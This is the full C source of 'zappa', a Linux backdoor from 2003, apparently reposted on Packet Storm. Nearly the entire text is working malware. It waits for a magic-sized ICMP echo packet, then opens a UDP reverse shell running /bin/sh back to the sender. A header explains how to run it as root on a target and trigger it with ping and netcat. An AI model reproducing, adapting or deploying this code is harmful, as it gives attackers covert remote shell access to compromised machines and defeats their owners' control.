An advanced backdoor which waits for a ICMP packet and then connects to a UDP server on the client.
a82f0882beed30e7c614cc2eabc39c2192750969a622ff0f723746be51b66bb6/***************************************************************************
* zappa v0.1beta - advanced backdoor (tested on linux 2.4.20)
* written by Soeren Bleikertz, 2oo3
* soeren@geekgate.org - http://www.sac.cc
*
* Description:
* 'zappa' is an advanced backdoor, which doesn't listen on a TCP-port for
* clients, further it waits for a special ICMP-packet and then it 'connects'
* to an UDP-server on the 'client'.
*
* manual:
* Start the backdoor with UID(0) on the target host and start a UDP-server on
* port <PORT> on your host. Use 'nc -ulp <PORT>' for it. Ping the host with the
* flags -c 1 -s <PKT_SIZE>. The backdoor will create a connection to your
* UDP-server and you can type in your commands.
*
* TODO:
* - hide raw-socket
* - BSD-compatible
*
****************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <time.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
//CONFIG
#define PORT 2323 //53 would be a nice value
#define PKT_SIZE 100 // ping -s <PKT_SIZE>
#define SHELL "/bin/sh"
#define TIMEOUT 20 //seconds
#define BUFF_SIZE 2048 //bytes
//EOC
#define BAN_WELCOME "evil backd00r - Have a lot of fun..\n" //change this :>
#define BAN_BYE "Have a nice day..\n"
//SIGCHLD-handler
void sig_chld(int signo)
{
pid_t pid;
int s;
while ((pid = waitpid(-1, &s, WNOHANG)) > 0)
return;
}
//UDP-based and passive backdoor
int backdoor(u_int32_t saddr)
{
struct sockaddr_in cli;
struct in_addr chkaddr;
//fd: child--write-->parent, //fd2: parent--write-->child
int sock, sock_b, pipe_b, fd[2], fd2[2], highfd;
char buffer[BUFF_SIZE];
socklen_t len;
pid_t pid;
fd_set readfds;
struct timeval tout; //timeout
if ((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
#ifdef DEBUG
perror("socket() failed");
#endif
return -1;
}
cli.sin_addr.s_addr = chkaddr.s_addr = saddr;
cli.sin_port = htons(PORT);
cli.sin_family = AF_INET;
len = sizeof(cli);
FD_ZERO(&readfds);
sendto(sock, BAN_WELCOME, sizeof(BAN_WELCOME), 0,
(struct sockaddr*)&cli, len);
#ifdef DEBUG
printf("send banner.\n");
#endif
if ((pipe(fd) == -1) || (pipe(fd2) == -1)) {
#ifdef DEBUG
perror("pipe() failed");
#endif
return -1;
}
//child
if ((pid=fork()) == 0) {
close(fd[0]); //close read-pipe
close(fd2[1]); //close write-pipe
//redirect I/O
dup2(fd2[0], 0);
dup2(fd[1], 1);
dup2(fd[1], 2);
execl(SHELL, SHELL, NULL); //start shell
close(fd[1]);
close(fd2[0]);
exit(0);
}
//parent
else if (pid > 0) {
close(fd[1]); //close write-pipe
close(fd2[0]); //close read-pipe
fcntl(sock, F_SETFL, O_NONBLOCK);
fcntl(fd[0], F_SETFL, O_NONBLOCK);
highfd = (sock > fd[0]) ?sock :fd[0];
#ifdef DEBUG
printf("select()...\n");
#endif
while(1) {
FD_SET(sock,&readfds);
FD_SET(fd[0],&readfds);
bzero(buffer, sizeof(buffer));
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
select(highfd+1, &readfds,NULL,NULL,&tout);
sock_b = recvfrom(sock, buffer, sizeof(buffer), 0,
(struct sockaddr*)&cli, &len);
pipe_b = read(fd[0], buffer, sizeof(buffer));
if (sock_b > 0) {
#ifdef DEBUG
printf("sock: %s\n", buffer);
#endif
//verify src-addr
if (chkaddr.s_addr != cli.sin_addr.s_addr)
continue;
write(fd2[1], buffer, sock_b);
}
if (pipe_b > 0) {
buffer[pipe_b] = 0;
#ifdef DEBUG
printf("pipe: %s\n", buffer);
#endif
sendto(sock, buffer, pipe_b, 0,
(struct sockaddr*)&cli, len);
}
if ((!pipe_b) || (!sock_b))
break;
}
close(fd[0]); //close pipe
close(fd2[1]); //close pipe
sendto(sock, BAN_BYE, sizeof(BAN_BYE), 0,
(struct sockaddr*)&cli, len);
close(sock); //close socket
}
else {
#ifdef DEBUG
perror("fork() failed");
#endif
return -1;
}
return 0;
}
//icmp-watchd
int main (int argc, char **argv)
{
int sock, recvb;
char buff[1024];
struct icmphdr *icmph;
struct iphdr *iph;
signal(SIGCHLD,sig_chld);
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) {
#ifdef DEBUG
perror("socket() failed"); //debug
#endif
exit(-1);
}
iph = (struct iphdr*) buff;
icmph = (struct icmphdr*) (buff + sizeof(*iph));
#ifdef DEBUG
printf("ICMP-WatchD...\n");
#endif
while ((recvb = recv(sock, buff, sizeof(buff), 0)) > 0) {
//is it our magic packet?
if ((icmph->type == ICMP_ECHO)
&& (recvb == PKT_SIZE+sizeof(*iph)+sizeof(*icmph))) {
backdoor(iph->saddr);
}
}
return 0;
}
//EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed